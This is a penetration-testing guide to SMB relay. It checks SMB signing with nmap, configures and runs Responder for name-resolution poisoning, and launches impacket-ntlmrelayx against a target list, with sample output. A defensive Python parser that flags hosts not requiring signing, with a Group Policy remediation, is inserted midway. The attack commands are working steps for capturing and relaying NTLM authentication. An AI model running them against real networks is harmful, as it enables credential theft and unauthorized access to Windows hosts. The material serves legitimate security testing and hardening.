# SMB Relay

## Prerequisites

### SMB Signing

By default, SMB signing is enabled but not required (not enforced) on Windows workstations, and enabled and required on Windows Servers.

### Nmap - SMB Security Mode Discovery

There are two Nmap scripts for detecting the SMB message signing mode, one for SMBv1 and one for SMBv2. We are going to use the SMBv2 one.

[nmap --script smb2-security-mode](https://nmap.org/nsedoc/scripts/smb2-security-mode.html)

```bash
nmap --script smb2-security-mode.nse -p 445 127.0.0.1

...
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 12:34:56:78:9A:BC (Unknown)

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
```

Copy all targets (IPs/hostnames) into targets.txt.
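From the defender's side, the same scan output gives the list of hosts to fix. The following is an added example (not from the original page or from the Nmap project): it parses `smb2-security-mode` results and lists hosts that answer SMB2 without requiring signing. The sample output, hostnames and function names are constructed for illustration.

```python
import re

# Constructed sample in nmap's normal output format (documentation addresses).
SAMPLE = """\
Nmap scan report for 192.0.2.10
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required

Nmap scan report for dc01.example.test (192.0.2.20)
Host script results:
| smb2-security-mode:
|   3.11:
|_    Message signing enabled and required

Nmap scan report for 192.0.2.30
445/tcp closed microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (.+)$")
DIALECT_RE = re.compile(r"^\|[ _]\s*([\d.:]+):\s*$")
SIGNING_RE = re.compile(r"^\|[ _]\s*Message signing (.+?)!?\s*$")

def audit_signing(nmap_text):
    """Return {host: {"dialects": [...], "mode": str|None, "required": bool|None}}."""
    report, current = {}, None
    for line in nmap_text.splitlines():
        if m := HOST_RE.match(line):
            current = report.setdefault(m.group(1), {"dialects": [], "mode": None, "required": None})
        elif current is None:
            continue  # script output before any host header: ignore
        elif m := DIALECT_RE.match(line):
            current["dialects"].append(m.group(1))
        elif m := SIGNING_RE.match(line):
            # Only "... and required" enforces signing; one weak dialect marks the host.
            enforced = m.group(1).endswith("and required")
            current["mode"] = m.group(1)
            current["required"] = enforced and current["required"] is not False
    return report

def needs_remediation(report):
    """Hosts that returned a script result but do not enforce signing."""
    return sorted(h for h, r in report.items() if r["required"] is False)

if __name__ == "__main__":
    for host in needs_remediation(audit_signing(SAMPLE)):
        print(f"{host}: require SMB signing")
```

Hosts in the list are remediated by requiring signing, for example with the Group Policy setting "Microsoft network server: Digitally sign communications (always)". A host with no script result (`required` is `None`) is unknown rather than safe and should be rescanned.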

### Admin Account

A user has to be an admin on the relayed machine (you can't do SMB relay without an admin account).

## Responder

### Modify Responder.conf

```bash
# locate Responder.conf
/usr/share/responder/Responder.conf
```

Disable these options:

* SMB = Off
* HTTP = Off

### Start Responder

```bash
responder -I eth0 -rdw -v
```

## NTLM RelayX

The relay server starts its own SMB and HTTP servers (that's why they are disabled in Responder).

```bash
#locate ntlmrelayx
impacket-ntlmrelayx -tf ./targets.txt -smb2support

..
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
```

## User Interaction

Now a user needs to access an SMB folder.
